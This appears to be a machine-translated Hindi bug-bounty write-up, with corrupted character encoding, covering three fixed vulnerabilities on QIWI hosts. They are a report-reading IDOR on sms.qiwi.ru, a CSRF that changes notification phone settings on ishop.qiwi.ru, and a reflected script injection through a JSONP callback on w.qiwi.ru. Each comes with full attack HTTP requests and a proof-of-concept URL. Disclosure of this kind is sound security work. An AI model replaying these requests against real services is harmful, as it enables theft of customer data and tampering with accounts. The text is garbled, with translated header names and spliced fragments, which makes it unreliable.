рдмрд╣реБрдд рдкрд╣рд▓реЗ рдирд╣реАрдВ, рдХреНрдпреВрдЖрдИрдбрдмреНрд▓реНрдпреВрдЖрдИ рдореЗрдВ, рд╣рдордиреЗ рдПрдХ рджрд┐рд▓рдЪрд╕реНрдк рдХрд╛рд░реНрдпрдХреНрд░рдо рд╢реБрд░реВ рдХрд┐рдпрд╛ -
рдЗрд╕реЗ рдПрдерд┐рдХ рд╣реИрдХ рдХрд╣рд╛ рдЬрд╛рддрд╛ рд╣реИ ред рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рд╣рдо рд╕рд┐рд╕реНрдЯрдо рдЗрдВрдЯрд░рдлреЗрд╕ рдореЗрдВ рддреНрд░реБрдЯрд┐рдпреЛрдВ рдФрд░ рдмрдЧ рдХреА рдЦреЛрдЬ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕рднреА рдХреЛ рдЖрдХрд░реНрд╖рд┐рдд рдХрд░рддреЗ рд╣реИрдВред рдореБрдЭреЗ рдПрдХ рдмрдЧ рдорд┐рд▓рд╛, рдЗрд╕реЗ рдПрдХ рдкрддреНрд░ рдореЗрдВ рд╡рд░реНрдгрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛, рдХреНрдпреВрдЖрдИрдбрдмреНрд▓реНрдпреВрдЖрдИ рд╕реЗ рдЗрдирд╛рдо рдорд┐рд▓рд╛ - рдпрд╣ рдЗрд╕ рддрд░рд╣ рд╕реЗ рдпреЛрдЬрдирд╛ рдХрд╛рдо рдХрд░рддреА рд╣реИред рдЬрдм рдХрд╛рд░реНрдпрдХреНрд░рдо рд╕рд┐рд░реНрдл рд▓реЙрдиреНрдЪ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рддреЛ рдХрд╛рд░реНрдпрд╛рд▓рдп рдХреЛ 2 рд╢рд┐рд╡рд┐рд░реЛрдВ рдореЗрдВ рд╡рд┐рднрд╛рдЬрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛: рдХреБрдЫ рд▓реЛрдЧ рд╕рдлрд▓рддрд╛ рдкрд░ рд╡рд┐рд╢реНрд╡рд╛рд╕ рдХрд░рддреЗ рдереЗ рдФрд░ рд╣реИрдХрд░реНрд╕ рд╕реЗ рд╕рд╣рд╛рдпрддрд╛ рдХреА рд╕рдВрднрд╛рд╡рдирд╛ рд░рдЦрддреЗ рдереЗ, рдЬрдмрдХрд┐ рдЕрдиреНрдп рдЗрд╕ рдЙрдкрдХреНрд░рдо рдХреЛ рд▓реЗрдХрд░ рд╕рдВрд╢рдп рдореЗрдВ рдереЗред рддрдм рдирд┐рд╖реНрдкрдХреНрд╖ рд░реВрдк рд╕реЗ рдиреНрдпрд╛рдп рдХрд░рдирд╛ рдореБрд╢реНрдХрд┐рд▓ рдерд╛ - рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рд╕рдВрднрд╛рд╡рд┐рдд рдкреВрд░реНрд╡рд╛рдиреБрдорд╛рдиреЛрдВ рдХреЗ рдЕрд▓рд╛рд╡рд╛ рдХреБрдЫ рднреА рдирд╣реАрдВ рдерд╛ред рдФрд░ рдЕрдм рд╣реИред рдФрд░ рд╣рдо рдХреЗрд╡рд▓ рдкреНрд░рд╛рдкреНрдд рдорд╛рдорд▓реЛрдВ рдХреЛ рдЖрдкрдХреЗ рд╕рд╛рде рд╕рд╛рдЭрд╛ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВред
рдХрд╛рд░реНрдпрдХреНрд░рдо рдХреЗ рд╢реБрднрд╛рд░рдВрдн рдХреЗ рдмрд╛рдж рд╕реЗ, рд╣рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдорд┐рд▓реА рд╣реИ рдФрд░ 150 рд╕реЗ рдЕрдзрд┐рдХ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЛ рдареАрдХ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рдХреБрдЫ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЗ рд▓рд┐рдП, рд╣рдордиреЗ 150,000 рд░реВрдмрд▓ рддрдХ рдХрд╛ рднреБрдЧрддрд╛рди рдХрд┐рдпрд╛, рд▓реЗрдХрд┐рди рд╣рдо рдЙрдиреНрд╣реЗрдВ рдЙрджрд╛рд╣рд░рдгреЛрдВ рдореЗрдВ рдкреНрд░рдХрд╛рд╢рд┐рдд рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗред
рдЗрд╕рд▓рд┐рдП, рдХрд╛рд░реНрдпрдХреНрд░рдо рдХрдард┐рди рд╣реЛ рдЧрдпрд╛ред рд╣рдордиреЗ рдмрд╣реБрдд рд╕рд╛рд░реЗ рдХреАрдбрд╝реЗ рдЬрдорд╛ рдХрд░ рд▓рд┐рдП рд╣реИрдВ рдЬрд┐рдиреНрд╣реЗрдВ рд╣рдордиреЗ рд╣реИрдХрд░реНрд╕ рдХреА рд╕рд╣рд╛рдпрддрд╛ рдХреЗ рд▓рд┐рдП рдзрдиреНрдпрд╡рд╛рдж рджрд┐рдпрд╛ рд╣реИред рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдЖрдкрдХреЗ рд▓рд┐рдП, рд╣рдордиреЗ рдХрдИ рдЙрджрд╛рд╣рд░рдгреЛрдВ рдкрд░ рдкреНрд░рдХрд╛рд╢ рдбрд╛рд▓рд╛ рд╣реИред рдПрдерд┐рдХ рд╣реИрдХ рд╕реЗ рдХреБрдЫ рд╡рд╛рд╕реНрддрд╡рд┐рдХ рдХрд╣рд╛рдирд┐рдпрд╛рдБред
рдкрд╣рд▓реА рдХрд╣рд╛рдиреА: рдЕрдиреНрдп рд▓реЛрдЧреЛрдВ рдХреА рд░рд┐рдкреЛрд░реНрдЯ рдкрдврд╝реЗрдВред
рдХрдордЬреЛрд░ рдореЗрдЬрдмрд╛рди: sms.qiwi.ru
рднреЗрджреНрдпрддрд╛ рдХрд╛ рдкреНрд░рдХрд╛рд░: рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдмрд╛рдИрдкрд╛рд╕ + рдХрдордЬреЛрд░ рдЖрдИрдбреА рд╕рддреНрдпрд╛рдкрди + рд╕рддреНрд░ рд╕рддреНрдпрд╛рдкрди рдирд╣реАрдВ
рдпрд╣ рдЖрдкрдХреЛ рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ: рдЕрдиреНрдп рд▓реЛрдЧреЛрдВ рдХреА рд░рд┐рдкреЛрд░реНрдЯ рдкрдврд╝реЗрдВ рдФрд░ рдХрдВрдкрдиреА рдХреЗ рдЧреНрд░рд╛рд╣рдХреЛрдВ рдФрд░ рдЙрдирдХреЗ рдХрд╛рд░реНрдпреЛрдВ рдХрд╛ рдЕрд╡рд▓реЛрдХрди рдХрд░реЗрдВ :)
рдЬрд╣рд╛рдБ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ: sms.qiwi.ru/bo/monitor/get_excel_format.jsp?html_file_name=reports/13/41/14.dat&report_name=report7&file_name_report7.xls&report_instance_id= рд╡рд╛рдВрдЫрд┐рдд рд░рд┐рдкреЛрд░реНрдЯ рдЖрдИрдбреА рдХреЛ рдЕрдВрдд рдореЗрдВ рд╕рдорд╛рдкреНрдд рдХрд░реЗрдВред рд░рд┐рдкреЛрд░реНрдЯреНрд╕ рдХреЗ рдмрд╛рдж (123456 -> рд░рд┐рдкреЛрд░реНрдЯ / 12/34 / 56.dat)ред рд╡реЛрдЗрд▓рд╛, рдЖрдкрдХреЗ рдкрд╛рд╕ рдХрд┐рд╕реА рдФрд░ рдХреА рд░рд┐рдкреЛрд░реНрдЯ рд╣реИ :)
рдХрд┐рд╕реА рдФрд░ рдХреА рд░рд┐рдкреЛрд░реНрдЯ рдХреА рдЪреЛрд░реА рдХреЗ рдЙрджрд╛рд╣рд░рдг рдХреЗ рд╕рд╛рде рдкреВрд░реНрдг GET рдЕрдиреБрд░реЛрдз:
GET /bo/monitor/get_excel_format.jsp?html_file_name=reports/13/41/14.dat&report_name=report7&file_name=report7.xport&report_instance_id= HTTP / 1.1
рд╣реЛрд╕реНрдЯ: sms.qiwi.ru
рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдВрдЯ: рдореЛрдЬрд╝рд┐рд▓рд╛ / 5.0 (Macintosh; рдЗрдВрдЯреЗрд▓ рдореИрдХ рдУрдПрд╕ рдПрдХреНрд╕ 10_8_3) AppleWebKit / 536.28.10 (KHTML, рдЧреЗрдХреЛ рдХреА рддрд░рд╣) рд╕рдВрд╕реНрдХрд░рдг / 6.0.3 рд╕рдлрд╛рд░реА / 536.28.10
рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдВ: рдЯреЗрдХреНрд╕реНрдЯ / html, рдПрдкреНрд▓рд┐рдХреЗрд╢рди / xhtml + xml, рдПрдкреНрд▓реАрдХреЗрд╢рди / xml; q = 0.9, * / *; q / =
рдореВрд▓:
sms.qiwi.ruрд╕реНрд╡реАрдХрд╛рд░-рдПрдирдХреЛрдбрд┐рдВрдЧ: рдЧрдЬрд╝рд┐рдк, рдЕрдкрд╕реНрдлреАрддрд┐
рд╕реНрд╡реАрдХрд╛рд░-рднрд╛рд╖рд╛: рдЖрд░рдпреВ
рд░реЗрдлрд░ :
sms.qiwi.ru/bo/monitor/report_view.jsp?instance_id=144114рдХреБрдХреА: JSESSIONID =; __utma = 200106670.88940096.1367226876.1367244987.136724674.7; __utmc = 200106670; __utmz = 200106670.1367247574.7.5ред
рдкреНрд░реЙрдХреНрд╕реА-рдХрдиреЗрдХреНрд╢рди: рдЬреАрд╡рд┐рдд рд░рдЦреЗрдВ
рджреВрд╕рд░реА рдХрд╣рд╛рдиреА: рдЕрдзрд┐рд╕реВрдЪрдирд╛ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЛ рдмрджрд▓рдирд╛ рдХреИрд╕реЗ рд╕рдВрднрд╡ рдерд╛ред
рдХрдордЬреЛрд░ рдореЗрдЬрдмрд╛рди
ishop.qiwi.ru
OWASP TOP 10 рд╡рд░реНрдЧреАрдХрд░рдг рднреЗрджреНрдпрддрд╛ рдкреНрд░рдХрд╛рд░
рдП 8 - рд╕реАрдПрд╕рдЖрд░рдПрдл
рдЬрд╣рд╛рдВ рдмрд┐рд▓реНрдХреБрд▓
ishop.qiwi.ru/notificationSave.actionрдХреНрдпрд╛ рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ
рднреЗрджреНрдпрддрд╛ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдХреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдЕрдзрд┐рд╕реВрдЪрдирд╛ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ (рдлреЛрди рдирдВрдмрд░, рдПрд╕рдПрдордПрд╕, рдЖрджрд┐) рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИ рдЬрдм рдпрд╣ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рд╣рдорд▓рд╛рд╡рд░ рджреНрд╡рд╛рд░рд╛ рдмрдирд╛рдП рдЧрдП рдкреГрд╖реНрда рдкрд░ рдЬрд╛рддрд╛ рд╣реИред
рдХреИрд╕реЗ рджреЛрд╣рд░рд╛рдПрдВ
1. рдХреБрдЫ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддреЗ рдХреЗ рддрд╣рдд рд▓реЙрдЧ рдЗрди рдХрд░реЗрдВред
2. рд╕реВрдЪрдирд╛ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХрд░реЗрдВред
3. рдЪрд░рдг 4 (рдкрд░реАрдХреНрд╖рдг) рдХрд░реЗрдВ
4. BurpSuite рдпрд╛ рдЗрд╕реА рддрд░рд╣ рдХреЗ рдЕрдиреБрдкреНрд░рдпреЛрдЧ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЕрдиреБрд░реЛрдз рднреЗрдЬреЗрдВ, рдХреБрдХреА рдХреЗ рд╕рд╛рде рдкреНрд░рд╛рдкреНрдд рдХреБрдХреА рдорд╛рдиреЛрдВ рдХреЛ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдирд╛ (JSAIONION)
POST /notificationSave.action HTTP / 1.1
рд╣реЛрд╕реНрдЯ: ishop.qiwi.ru
рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдВрдЯ: рдореЛрдЬрд╝рд┐рд▓рд╛ / 5.0 (рд╡рд┐рдВрдбреЛрдЬ NT 6.1; WOW64; рдЖрд░рд╡реА: 20.0) рдЧреЗрдХреЛ / 20100101 рдлрд╝рд╛рдпрд░рдлрд╝реЙрдХреНрд╕ / 20.0
рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдВ: рдЯреЗрдХреНрд╕реНрдЯ / html, рдПрдкреНрд▓рд┐рдХреЗрд╢рди / xhtml + xml, рдПрдкреНрд▓реАрдХреЗрд╢рди / xml; q = 0.9, * / *; q / =
рд╕реНрд╡реАрдХрд╛рд░-рднрд╛рд╖рд╛: ru-RU, ru; q = 0.8, en-US; q = 0.5, en; q = 0.3
рд╕реНрд╡реАрдХрд╛рд░-рдПрдирдХреЛрдбрд┐рдВрдЧ: рдЧрдЬрд╝рд┐рдк, рдЕрдкрд╕реНрдлреАрддрд┐
рд░реЗрдлрд░ :
ishop.qiwi.ru/notifications.actionрдХреБрдХреА: __utma = 200106670.867508279.1368788962.1368788962.1369037765.2; __utmz = 200106670.1368788962.1.1.utmcsr = (рдкреНрд░рддреНрдпрдХреНрд╖) | utmccn = (рдкреНрд░рддреНрдпрдХреНрд╖) | utmcmd = (none) __utmc = 200106670; JSESSIONID =; рдиреЛрдб- ishop04.1; __utma = 47471167.1903908478.1369624211.1369650501.1369717004.6; __utmc = 47471167; __utmz = 47471167.1369717004.6.2.utmcsr = ishopnew.qiwi.ru | utmccn = (рд░реЗрдлрд░рд▓) | utmcmd = рд░реЗрдлрд░рд▓ | utmcct / / | __utmb = 47471167.25.10.1369717004
рдХрдиреЗрдХреНрд╢рди: рдЬреАрд╡рд┐рдд рд░рдЦреЗрдВ
рд╕рд╛рдордЧреНрд░реА-рдкреНрд░рдХрд╛рд░: рдЖрд╡реЗрджрди / x-www-form-urlencoded
рд╕рд╛рдордЧреНрд░реА-рд▓рдВрдмрд╛рдИ: 244
phone = & рдЖрдиреЗ рд╡рд╛рд▓реАBillMail = true рдФрд░ __ checkbox_incomingBillMail = true рдФрд░ __ checkbox_incomingPayMail = true & __ checkbox_incomingPaySMS = true & __ checkbox_cancelPayMail = true рдФрд░ __ checkbox_cancelPaySMS = рд╕рддреНрдп
5. рдиреЛрдЯрд┐рдлрд┐рдХреЗрд╢рди рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдкреЗрдЬ рдкрд░ рдЬрд╛рдПрдВ, рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░реЗрдВ рдХрд┐ рдлреЛрди рдирдВрдмрд░ рдФрд░ рдиреЛрдЯрд┐рдлрд┐рдХреЗрд╢рди рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдмрджрд▓ рдЧрдП рд╣реИрдВ
рдкрддрд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕рд┐рдлрд╛рд░рд┐рд╢реЗрдВ
рдПрдХ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдорд╛рди рдпреБрдХреНрдд рдПрдХ рдЫрд┐рдкрд╛ рд╣реБрдЖ рдлрд╝реЙрд░реНрдо рдлрд╝реАрд▓реНрдб рдЬреЛрдбрд╝реЗрдВ - CSRF рдЯреЛрдХрдиред
www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_SheetрддреАрд╕рд░реА рдХрд╣рд╛рдиреА: рдордирдорд╛рдирд╛ рдХреЛрдбред
рд╕рд╛рдЗрдЯ
w.qiwi.ru рдкрд░ рддреНрд░реБрдЯрд┐ рдкрд╛рдИ рдЧрдИред
/User/communication/sendms.action рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдореЗрдВ рдХреЙрд▓рдмреИрдХ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд▓рд┐рдП рдЖрдЙрдЯрдкреБрдЯ рдХреА рдХреЛрдИ рдорд╛рдиреНрдпрддрд╛ рдФрд░ рд╕реНрдХреНрд░реАрдирд┐рдВрдЧ рдирд╣реАрдВ рд╣реИред
рдЧреНрд░рд╛рд╣рдХ рдкрдХреНрд╖ рдкрд░ рдордирдорд╛рдирд╛ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛ рд╕рдВрднрд╡ рд╣реИред
рдПрдХ рд╣рдорд▓реЗ рдХрд╛ рд╕рдВрдЪрд╛рд▓рди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрдВрдЬреАрдХрд░рдг рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИред рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдмреНрд░рд╛рдЙрдЬрд╝рд░ рджреНрд╡рд╛рд░рд╛ рдкреНрд░рд╕реНрддрд╛рд╡рд┐рдд рдЬрд╛рд╡рд╛рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЛ рдЦреЛрд▓рдирд╛ рд╣реЛрдЧрд╛ред
рдЙрджрд╛рд╣рд░рдг рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░реЗрдВ
GET /user/communication/sendms.action?number=&text=111&callback =>> ""; HTTP / 1.1
рд╣реЛрд╕реНрдЯ: w.qiwi.ru
рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдВрдЯ: рдореЛрдЬрд╝рд┐рд▓рд╛ / 5.0 (рд╡рд┐рдВрдбреЛрдЬ NT 6.1; WOW64; рдЖрд░рд╡реА: 20.0) рдЧреЗрдХреЛ / 20100101 рдлрд╝рд╛рдпрд░рдлрд╝реЙрдХреНрд╕ / 20.0
рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдВ: рдкрд╛рда / рдЬрд╛рд╡рд╛рд╕реНрдХреНрд░рд┐рдкреНрдЯ, рдЖрд╡реЗрджрди / рдЬрд╛рд╡рд╛рд╕реНрдХреНрд░рд┐рдкреНрдЯ, * / *
рд╕реНрд╡реАрдХрд╛рд░-рднрд╛рд╖рд╛: ru-RU, ru; q = 0.8, en-US; q = 0.5, en; q = 0.3
рд╕реНрд╡реАрдХрд╛рд░-рдПрдирдХреЛрдбрд┐рдВрдЧ: рдЧрдЬрд╝рд┐рдк, рдЕрдкрд╕реНрдлреАрддрд┐
X-Requested-With: XMLHttpRequest
рд░реЗрдлрд░ :
w.qiwi.ru/communication.actionрдХреБрдХреА: __utma = 153665022.317299647.1368525797.1368679677.1368684655.3; __utmz = 153665022.1368684655.3.3.utmcsr = google | utmccn = (рдХрд╛рд░реНрдмрдирд┐рдХ) | utmcmd = рдХрд╛рд░реНрдмрдирд┐рдХ | utmctr = qiwi% 20webmoney; JSESSIONID = .node-wb02.2; __utmc = 153665022; __utmb = 153665022.34.10.1368684655
рдХрдиреЗрдХреНрд╢рди: рдЬреАрд╡рд┐рдд рд░рдЦреЗрдВ
рд╕рд╛рдордЧреНрд░реА-рд▓рдВрдмрд╛рдИ: 6
рдЬрд╡рд╛рдм рд╣реИ
HTTP / 1.1 200 рдареАрдХ рд╣реИ
рджрд┐рдирд╛рдВрдХ: рдЧреБрд░реБ, 16 рдордИ 2013 08:16:14 GMT
рдЕрд╡рд╕рд╛рди: рд╕рдд, 6 рдордИ 1995 12:00:00 GMT
рдХреИрд╢-рдХрдВрдЯреНрд░реЛрд▓: рдиреЛ-рд╕реНрдЯреЛрд░, рдиреЛ-рдХреИрд╢, рд░реА-рд░рд┐рд╡рд╛рдЗрдВрдб рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП
рдХреИрд╢-рдХрдВрдЯреНрд░реЛрд▓: рдкреЛрд╕реНрдЯ-рдЪреЗрдХ = 0, рдкреНрд░реА-рдЪреЗрдХ = 0
рдкреНрд░рдЬреНрдЮрд╛: рдиреЛ-рдХреИрд╢
рд╕рд╛рдордЧреНрд░реА-рдкреНрд░рдХрд╛рд░: рдкрд╛рда / рдЬрд╛рд╡рд╛рд╕реНрдХреНрд░рд┐рдкреНрдЯ; рдЪрд╛рд░рд╕реЗрдЯ = utf-8
рдХрдВрдЯреЗрдВрдЯ-рд▓реЗрдВрде: 142
рдХреАрдк-рдЕрд▓рд╛рдЗрд╡: рдЯрд╛рдЗрдордЖрдЙрдЯ = рел, рдЕрдзрд┐рдХрддрдо = резрежреж
рдХрдиреЗрдХреНрд╢рди: рдХреАрдк-рдЕрд▓рд╛рдЗрд╡
<> "'; ({рддреНрд░реБрдЯрд┐: 0, рдбреЗрдЯрд╛: {" рдкреБрд╖реНрдЯрд┐рдХрд░рдг рд╢рдмреНрдж ": рд╕рддреНрдп," рдкреБрд╖реНрдЯрд┐рдХрд░рдг ":" "," рдкреНрд░рджрд╛рддрд╛ ":" 199 "," рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛ ":" "}, рд╕рдВрджреЗрд╢: [], рддреНрд░реБрдЯрд┐рдпрд╛рдВ: [], рдлрд╝реАрд▓реНрдбрд░рд┐рдпрд░реНрд╕: []})
рдЕрд╡рдзрд╛рд░рдгрд╛ рдХрд╛ рдкреНрд░рдорд╛рдг
Internet Explorer рдореЗрдВ, рдкрд░ рдЬрд╛рдПрдБ
w.qiwi.ru/user/communication/sendsms.action?number= рдкрд╛рда = 111 рдФрд░ рдХреЙрд▓рдмреИрдХ = WScript.Echo ('XSS');
рдЬрд╛рдБрдЪ рдХрд░рддреЗ рд╕рдордп, Internet Explorer рд╕рдВрд╕реНрдХрд░рдг 9 рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред